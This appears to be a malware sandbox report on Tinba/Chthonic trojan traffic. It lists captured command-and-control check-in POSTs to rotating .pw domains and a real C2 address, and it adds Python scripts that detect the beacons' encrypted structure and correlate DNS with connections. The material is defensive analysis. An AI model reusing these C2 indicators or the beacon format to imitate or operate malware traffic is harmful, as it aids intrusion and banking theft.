Source: Traffic | Snort IDS: 2830613 ETPRO TROJAN W32/Chthonic CnC Activity 192.168.2.4:49748 -> 216.218.185.162:80
Source: global traffic | HTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0 | Host: spaines.pw | Content-Length: 157 | Data Raw: fd 32 8e 32 cc 3a 8e 32 13 62 d0 aa fb 30 8f 11 cd 02 be 02 cd 02 be 02 | Data Ascii: 22:2b0
Source: global traffic | HTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0 | Host: uyhgqunqkxnx.pw | Content-Length: 157 | Data Raw: 81 b7 8b db b9 bf 8b db 6f e7 d5 43 87 b5 8a f8 b1 87 bb eb b1 87 bb eb | Data Ascii: oC
Source: global traffic | HTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0 | Host: vcklmnnejwxx.pw | Content-Length: 157 | Data Raw: c0 9a d3 e5 f9 92 d3 e5 2e ca 8d 7d c6 98 d2 c6 f0 aa e3 d5 f0 aa e3 d5 | Data Ascii: .}
Source: global traffic | HTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0 | Host: cmnsgscccrej.pw | Content-Length: 157 | Data Raw: 4f 34 bc a9 75 3c bc a9 a1 64 e2 31 49 36 bd 8a 7f 04 8c 99 7f 04 8c 99 | Data Ascii: O4u<d1I6
Source: global traffic | HTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0 | Host: evbsdqvgmpph.pw | Content-Length: 157 | Data Raw: f4 47 54 60 cf 4f 54 60 1a 17 0a f8 f2 45 55 43 c4 77 64 50 c4 77 64 50 | Data Ascii: GT`OT`EUCwdPwdP
Source: global traffic | HTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0 | Host: mfueeimvyrsp.pw | Content-Length: 157 | Data Raw: 52 0c 05 15 6e 04 05 15 bc 5c 5b 8d 54 0e 04 36 62 3c 35 25 62 3c 35 25 | Data Ascii: Rn\[T6b<5%b<5%
Source: global traffic | HTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0 | Host: utmyhnffxpcj.pw | Content-Length: 157 | Data Raw: a4 50 75 f5 98 58 75 f5 4a 00 2b 6d a2 52 74 d6 94 60 45 c5 94 60 45 c5 | Data Ascii: PuXuJ+mRt`E`E
Source: global traffic | HTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0 | Host: fkmmvfeonnyh.pw | Content-Length: 157 | Data Raw: 6d 34 3b 95 50 3c 3b 95 83 64 65 0d 6b 36 3a b6 5d 04 0b a5 5d 04 0b a5 | Data Ascii: m4;P<;dek6:]]
Source: global traffic | HTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0 | Host: gfnlmtcolrrb.pw | Content-Length: 157 | Data Raw: 91 76 5a 68 af 7e 5a 68 7f 26 04 f0 97 74 5b 4b a1 46 6a 58 a1 46 6a 58 | Data Ascii: vZh~Zh&t[KFjXFjX
Source: global traffic | HTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0 | Host: wwgfyvvdtmeq.pw | Content-Length: 157 | Data Raw: ec b1 0c 1d d3 b9 0c 1d 02 e1 52 85 ea b3 0d 3e dc 81 3c 2d dc 81 3c 2d | Data Ascii: R><-<-
Source: global traffic | HTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0 | Host: xtbbpqfrsubt.pw | Content-Length: 157 | Data Raw: f3 e1 ef cd cc e9 ef cd 1d b1 b1 55 f5 e3 ee ee c3 d1 df fd c3 d1 df fd | Data Ascii: U
Source: global traffic | HTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0 | Host: vrmtybxxpddg.pw | Content-Length: 157 | Data Raw: ea 5f bf 93 aa 57 bf 93 04 0f e1 0b ec 5d be b0 da 6f 8f a3 da 6f 8f a3 | Data Ascii: _W]oo
Source: global traffic | HTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0 | Host: fccfxejgtpqb.pw | Content-Length: 157 | Data Raw: ad ed 2a 61 ec e5 2a 61 43 bd 74 f9 ab ef 2b 42 9d dd 1a 51 9d dd 1a 51 | Data Ascii: *a*aCt+BQQ
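The thirteen POSTs above are what the Snort rows (ET 2020418 "Tinba Checkin 2", ET 2024659 "[PTsecurity] Tinba Checkin 4", ETPRO 2830613) fired on: HTTP/1.0 POST, no User-Agent, the same path on every host, Content-Length 157 every time, and a binary body. The Emerging Threats rules' own match logic is not reproduced here. What can be derived from the page is that the 24 body bytes the report prints share fixed relations: treating them as six 4-byte words d0..d5, bytes 1-3 of d0^d1 are always 08 00 00 while byte 0 changes per request, d0^d3 is always 06 02 01 23, and d4 equals d5. Word-XOR relations like these are what survive if the body is XORed with a repeating 4-byte key over a fixed-layout header; that is an inference from these 13 bodies, not a published description of the protocol. The script below is an added example, not part of the report or of any rule set: it rebuilds the captured requests from the rows above (constructed input), checks the structural invariants, and combines them with the weaker header indicators into a single verdict, with a constructed benign POST for contrast.

```python
"""Structural check for the Tinba check-in POSTs recorded in this report.

Added example; the invariants were derived from the 13 request bodies the report
prints, not from any published protocol description.
"""
from typing import Dict, List

CAMPAIGN_PATH = "/EiDQjNbWEQ/"  # URI used by every beacon in the report

# Constructed from the report's "HTTP traffic detected" rows: Host header and the
# 24 body bytes printed under "Data Raw" (Content-Length was 157 in every case).
REPORT_BEACONS = [
    ("spaines.pw",      "fd 32 8e 32 cc 3a 8e 32 13 62 d0 aa fb 30 8f 11 cd 02 be 02 cd 02 be 02"),
    ("uyhgqunqkxnx.pw", "81 b7 8b db b9 bf 8b db 6f e7 d5 43 87 b5 8a f8 b1 87 bb eb b1 87 bb eb"),
    ("vcklmnnejwxx.pw", "c0 9a d3 e5 f9 92 d3 e5 2e ca 8d 7d c6 98 d2 c6 f0 aa e3 d5 f0 aa e3 d5"),
    ("cmnsgscccrej.pw", "4f 34 bc a9 75 3c bc a9 a1 64 e2 31 49 36 bd 8a 7f 04 8c 99 7f 04 8c 99"),
    ("evbsdqvgmpph.pw", "f4 47 54 60 cf 4f 54 60 1a 17 0a f8 f2 45 55 43 c4 77 64 50 c4 77 64 50"),
    ("mfueeimvyrsp.pw", "52 0c 05 15 6e 04 05 15 bc 5c 5b 8d 54 0e 04 36 62 3c 35 25 62 3c 35 25"),
    ("utmyhnffxpcj.pw", "a4 50 75 f5 98 58 75 f5 4a 00 2b 6d a2 52 74 d6 94 60 45 c5 94 60 45 c5"),
    ("fkmmvfeonnyh.pw", "6d 34 3b 95 50 3c 3b 95 83 64 65 0d 6b 36 3a b6 5d 04 0b a5 5d 04 0b a5"),
    ("gfnlmtcolrrb.pw", "91 76 5a 68 af 7e 5a 68 7f 26 04 f0 97 74 5b 4b a1 46 6a 58 a1 46 6a 58"),
    ("wwgfyvvdtmeq.pw", "ec b1 0c 1d d3 b9 0c 1d 02 e1 52 85 ea b3 0d 3e dc 81 3c 2d dc 81 3c 2d"),
    ("xtbbpqfrsubt.pw", "f3 e1 ef cd cc e9 ef cd 1d b1 b1 55 f5 e3 ee ee c3 d1 df fd c3 d1 df fd"),
    ("vrmtybxxpddg.pw", "ea 5f bf 93 aa 57 bf 93 04 0f e1 0b ec 5d be b0 da 6f 8f a3 da 6f 8f a3"),
    ("fccfxejgtpqb.pw", "ad ed 2a 61 ec e5 2a 61 43 bd 74 f9 ab ef 2b 42 9d dd 1a 51 9d dd 1a 51"),
]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def words(body: bytes) -> List[bytes]:
    """The six 4-byte words that open a body."""
    return [body[i:i + 4] for i in range(0, 24, 4)]


def has_checkin_structure(body: bytes) -> bool:
    """Relations every captured body satisfies. Under a repeating 4-byte XOR key the
    XOR of two ciphertext words equals the XOR of the plaintext words, so fixed
    plaintext relations show through different encrypted bodies (assumption)."""
    if len(body) < 24:
        return False
    d = words(body)
    return (xor(d[0], d[1])[1:] == b"\x08\x00\x00"
            and xor(d[0], d[3]) == b"\x06\x02\x01\x23"
            and d[4] == d[5])


def counter_byte(body: bytes) -> int:
    """The single byte of d0^d1 that differs between beacons (mostly increasing in the report)."""
    d = words(body)
    return xor(d[0], d[1])[0]


def beacon_request(host: str, hex_body: str) -> Dict:
    """Rebuild a captured request as a plain dict with only the headers the report shows."""
    return {"method": "POST", "version": "HTTP/1.0", "path": CAMPAIGN_PATH, "host": host,
            "headers": {"Host": host, "Content-Length": "157"},
            "body": bytes.fromhex(hex_body)}


def indicators(req: Dict) -> List[str]:
    """Reasons a request resembles the beacons in this report, weakest first."""
    hdrs = {k.lower(): v for k, v in req["headers"].items()}
    found = []
    if req["method"] == "POST" and req["version"] == "HTTP/1.0":
        found.append("POST over HTTP/1.0")
    if "user-agent" not in hdrs:
        found.append("no User-Agent header")
    if hdrs.get("content-length") == "157":
        found.append("Content-Length 157")
    if req["host"].endswith(".pw") and req["path"] == CAMPAIGN_PATH:
        found.append("host/path match the reported campaign")
    if has_checkin_structure(req["body"]):
        found.append("body header has the check-in structure")
    return found


def is_tinba_checkin(req: Dict) -> bool:
    """The body structure alone is decisive; otherwise require three weaker indicators."""
    return has_checkin_structure(req["body"]) or len(indicators(req)) >= 3


# Constructed benign POST for contrast: ordinary browser headers, unstructured body.
BENIGN_REQUEST = {"method": "POST", "version": "HTTP/1.1", "path": "/api/login", "host": "example.com",
                  "headers": {"Host": "example.com", "User-Agent": "Mozilla/5.0", "Content-Length": "31"},
                  "body": b'{"user":"alice","pw":"hunter2"}'}

if __name__ == "__main__":
    for host, hex_body in REPORT_BEACONS:
        req = beacon_request(host, hex_body)
        print(f"{host:18} counter=0x{counter_byte(req['body']):02x} tinba={is_tinba_checkin(req)}")
    print("benign flagged:", is_tinba_checkin(BENIGN_REQUEST))
```

All 13 beacons satisfy the structural test and the benign request does not. The structural check is the one worth carrying into a detection: the host names rotate through many .pw domains and the path is campaign-specific, whereas the word relations hold across every host in the capture. Treat the 0x08 / 06 02 01 23 constants as specific to this sample until confirmed on other captures.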
Source: Joe Sandbox View | IP Address: 216.218.185.162
Source: Joe Sandbox View | ASN Name: HURRICANEUS
Source: Joe Sandbox View | ASN Name: AS-CHOOPAUS
Source: Joe Sandbox View | JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: global traffic | HTTP traffic detected:
    POST /threshold/xls.aspx HTTP/1.1
    Origin: https://www.bing.com
    Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
    Accept: */*
    Accept-Language: en-CH
    Content-type: text/xml
    X-Agent-DeviceId: 01000A4109000CC6
    X-BM-CBT: 1696420817
    X-BM-DateFormat: dd/MM/yyyy
    X-BM-DeviceDimensions: 784x984
    X-BM-DeviceDimensionsLogical: 784x984
    X-BM-DeviceScale: 100
    X-BM-DTZ: 60
    X-BM-Market: CH
    X-BM-Theme: 000000;0078d7
    X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
    X-Device-ClientSession: 0912CF9094994CFA88DE52C6FB19D4E1
    X-Device-isOptin: false
    X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
    X-Device-OSSKU: 48
    X-Device-Touch: false
    X-DeviceID: 01000A4109000CC6
    X-MSEdge-ExternalExp: bfbwsbrs0830tf,d-thshldspcl40,msbdsborgv2co,msbwdsbi920t1,spofglclicksh-c2,webtophit0r_t,wsbmsaqfuxtc,wsbqfasmsall_t,wsbqfminiserp400,wsbref-t
    X-MSEdge-ExternalExpType: JointCoord
    X-PositionerType: Desktop
    X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
    X-Search-CortanaAvailableCapabilities: None
    X-Search-SafeSearch: Moderate
    X-Search-TimeZone: Bias=0; DaylightBias=-60; TimeZoneKeyName=GMT Standard Time
    X-UserAgeClass: Unknown
    Accept-Encoding: gzip, deflate, br
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
    Host: www.bing.com
    Content-Length: 2232
    Connection: Keep-Alive
    Cache-Control: no-cache
    Cookie: MUID=6666694284484FA1B35CCB433D42E997; _SS=SID=193A581F83766B4319784BBF829B6A16&CPID=1696420820117&AC=1&CPH=e5c79613&CBV=39942242; _EDGE_S=SID=193A581F83766B4319784BBF829B6A16; SRCHUID=V=2&GUID=BA43D82178364AEA9C1EE6C32BE93416&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231003; SRCHHPGUSR=SRCHLANG=en&LUT=1696420817741&IPMH=425591ef&IPMID=1696420817913&HV=1696417346; ANON=A=6D8F9DF00282E660E425530EFFFFFFFF; CortanaAppUID=4C9C2B2D0465FD7A42C74C7E93CFB630; MUIDB=6666694284484FA1B35CCB433D42E997
    (This request carries Cortana's own User-Agent and X-Search-AppId and corresponds to SearchApp.exe in the process tree: background traffic from the analysis VM, not part of the .pw beaconing above. It is the only request on this page with a browser User-Agent.)
            Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.32 (reported 22 times)
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 14 times; 1.1.1.1 is Cloudflare's public DNS resolver, so these are most likely the sandbox's own lookups, which by their nature cannot be preceded by a DNS query)
            Source: C:\Windows\SysWOW64\winver.exe | Code function: 2_2_02F02F88 send,send,recv,closesocket
            Source: SearchApp.exe, 0000000B.00000000.1809980582.0000024B551F3000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: www.google.www.yahoo. equals www.yahoo.com (Yahoo)
            Source: unknown | DNS traffic detected: queries for: spaines.pw
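The "traffic without corresponding DNS query" and "DNS traffic detected: queries for" rows above are the result of a simple correlation that an analyst can re-run over their own capture. The script below is an added example written for this report, not Joe Sandbox code: it replays a constructed event list that mirrors the findings above (one lookup of spaines.pw, two TCP connections to 173.222.162.32 that no lookup preceded, and the raw UDP packets to the resolver 1.1.1.1) and reproduces the two signatures. The address 198.51.100.7 that spaines.pw resolves to in the sample data is a TEST-NET-2 placeholder, since the report does not show the real answer. Unlike the raw signature, the correlation excludes traffic to the configured resolver, which is why the report's 1.1.1.1 rows disappear unless that exclusion is switched off.

```python
"""Replay a sandbox-style network event stream and reproduce the report's
"DNS traffic detected: queries for" and "TCP/UDP traffic detected without
corresponding DNS query" signatures.

Added example for this report, not Joe Sandbox code. The event list is
constructed; 198.51.100.7 (TEST-NET-2) stands in for the real answer to
spaines.pw, which the report does not show.
"""
from dataclasses import dataclass, field


@dataclass(frozen=True)
class NetEvent:
    ts: float          # seconds since capture start
    kind: str          # "dns_query", "dns_answer", "tcp" or "udp"
    dst: str           # destination IP (the resolver for dns_* events)
    dport: int = 0
    name: str = ""     # hostname for dns_* events
    answer: str = ""   # resolved address for dns_answer events


@dataclass
class Findings:
    queried_domains: list = field(default_factory=list)
    resolved: dict = field(default_factory=dict)        # dst ip -> hostname
    unresolved_tcp: dict = field(default_factory=dict)  # dst ip -> connection count
    unresolved_udp: dict = field(default_factory=dict)


def correlate(events, resolvers=frozenset({"1.1.1.1"})):
    """Walk events in time order and tie each connection to an earlier DNS answer.

    A connection whose destination never appeared in a DNS answer earlier in
    the capture is reported as "without corresponding DNS query". Port-53
    traffic to a configured resolver is skipped: it *is* the DNS channel and
    can never be preceded by a lookup, so flagging it is noise.
    """
    findings = Findings()
    ip_to_name = {}
    for ev in sorted(events, key=lambda e: e.ts):   # stable sort keeps tie order
        if ev.kind == "dns_query":
            if ev.name not in findings.queried_domains:
                findings.queried_domains.append(ev.name)
        elif ev.kind == "dns_answer":
            ip_to_name[ev.answer] = ev.name
        elif ev.kind in ("tcp", "udp"):
            if ev.dst in resolvers and ev.dport == 53:
                continue
            if ev.dst in ip_to_name:
                findings.resolved[ev.dst] = ip_to_name[ev.dst]
            else:
                bucket = (findings.unresolved_tcp if ev.kind == "tcp"
                          else findings.unresolved_udp)
                bucket[ev.dst] = bucket.get(ev.dst, 0) + 1
    return findings


def summarize(findings):
    """Render findings as report-style lines, one per destination."""
    lines = []
    if findings.queried_domains:
        lines.append("DNS traffic detected: queries for: "
                     + ", ".join(findings.queried_domains))
    for ip, name in findings.resolved.items():
        lines.append(f"Traffic to {ip} resolved from {name}")
    for proto, bucket in (("TCP", findings.unresolved_tcp),
                          ("UDP", findings.unresolved_udp)):
        for ip, n in bucket.items():
            lines.append(f"{proto} traffic detected without corresponding "
                         f"DNS query: {ip} ({n} connections)")
    return lines


# Constructed events, not a real capture: the spaines.pw lookup as two raw
# UDP packets to the resolver plus the parsed query and answer, one
# connection to the placeholder answer address, and two connections to
# 173.222.162.32 that no lookup preceded.
SAMPLE_EVENTS = [
    NetEvent(0.50, "udp", "1.1.1.1", 53),
    NetEvent(0.50, "dns_query", "1.1.1.1", 53, name="spaines.pw"),
    NetEvent(0.62, "udp", "1.1.1.1", 53),
    NetEvent(0.62, "dns_answer", "1.1.1.1", 53, name="spaines.pw", answer="198.51.100.7"),
    NetEvent(0.70, "tcp", "198.51.100.7", 443),
    NetEvent(1.00, "tcp", "173.222.162.32", 443),
    NetEvent(1.15, "tcp", "173.222.162.32", 443),
]

if __name__ == "__main__":
    for line in summarize(correlate(SAMPLE_EVENTS)):
        print(line)
    # Without the resolver exclusion the UDP rows for 1.1.1.1 come back,
    # matching the raw report output.
    print(correlate(SAMPLE_EVENTS, resolvers=frozenset()).unresolved_udp)
```

A destination with no observed lookup is a triage hint, not proof of a hard-coded C2 address: the name may have been resolved before the capture started or served from the resolver cache, so confirm with the process that opened the socket (here the report points at injected code in winver.exe) before treating the IP as an indicator.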
            Source: unknown | HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1 to Host: www.bing.com (the same Cortana search pane request already listed above under Source: global traffic; the identical headers and cookies are not repeated here)
            Source: explorer.exe, 00000003.00000000.1636127493.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3032615601.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: svchost.exe, 00000006.00000000.1717750240.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2954823993.0000019E29FDC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1717816031.0000019E29FDC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2952613468.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
            Source: explorer.exe, 00000003.00000000.1636127493.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3032615601.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: svchost.exe, 00000006.00000000.1717750240.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2954823993.0000019E29FDC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1717816031.0000019E29FDC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2952613468.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
            Source: SearchApp.exe, 0000000B.00000000.1749414495.000002434119B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
            Source: explorer.exe, 00000003.00000000.1636127493.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3032615601.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: svchost.exe, 00000006.00000000.1717750240.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2954823993.0000019E29FDC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1717816031.0000019E29FDC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2952613468.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
            Source: explorer.exe, 00000003.00000000.1636127493.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3032615601.000000000982D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1717750240.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2954823993.0000019E29FDC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1717816031.0000019E29FDC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2952613468.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
            Source: SearchApp.exe, 0000000B.00000000.1749414495.000002434119B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
            Source: explorer.exe, 00000003.00000000.1636127493.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
            Source: SearchApp.exe, 0000000B.00000000.1767034609.0000024B441DE000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
            Source: explorer.exe, 00000003.00000000.1638748938.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1636906084.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1637467440.0000000008720000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 0000000A.00000002.2954695107.000001ECFC470000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
            Source: explorer.exe, 00000003.00000002.3058572833.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1640019930.000000000C964000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: svchost.exe, 00000005.00000002.2908871960.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714413408.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://%s.dnet.xboxlive.com
            Source: svchost.exe, 00000005.00000002.2908871960.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714413408.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://%s.xboxlive.com
            Source: svchost.exe, 00000005.00000002.2907008745.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714465994.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714381693.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com
            Source: explorer.exe, 00000003.00000000.1640019930.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3058572833.000000000C893000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
            Source: svchost.exe, 00000005.00000002.2907008745.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714381693.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.comt
            Source: SearchApp.exe, 0000000B.00000000.1749414495.000002434119B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1761686627.0000024B4239F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
            Source: SearchApp.exe, 0000000B.00000000.1757604184.0000024B41F45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
            Source: SearchApp.exe, 0000000B.00000000.1757604184.0000024B41F45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
            Source: explorer.exe, 00000003.00000000.1636127493.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/Vh5j3k
            Source: explorer.exe, 00000003.00000000.1636127493.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/odirmr
            Source: explorer.exe, 00000003.00000000.1640019930.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3058572833.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOS
            Source: explorer.exe, 00000003.00000002.3032615601.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/
            Source: explorer.exe, 00000003.00000002.3032615601.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/q
            Source: explorer.exe, 00000003.00000000.1634654042.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2936439157.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1635196527.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2901515644.0000000001240000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
            Source: explorer.exe, 00000003.00000002.3032615601.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.00000000096DF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
            Source: explorer.exe, 00000003.00000002.3032615601.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
            Source: explorer.exe, 00000003.00000002.3032615601.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.00000000096DF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://arc.msn.comi
            Source: svchost.exe, 00000005.00000002.2910596872.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2907008745.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714381693.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714440936.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.activity.windows.com
            Source: svchost.exe, 00000005.00000002.2907008745.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714381693.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.activity.windows.com/v1/assets
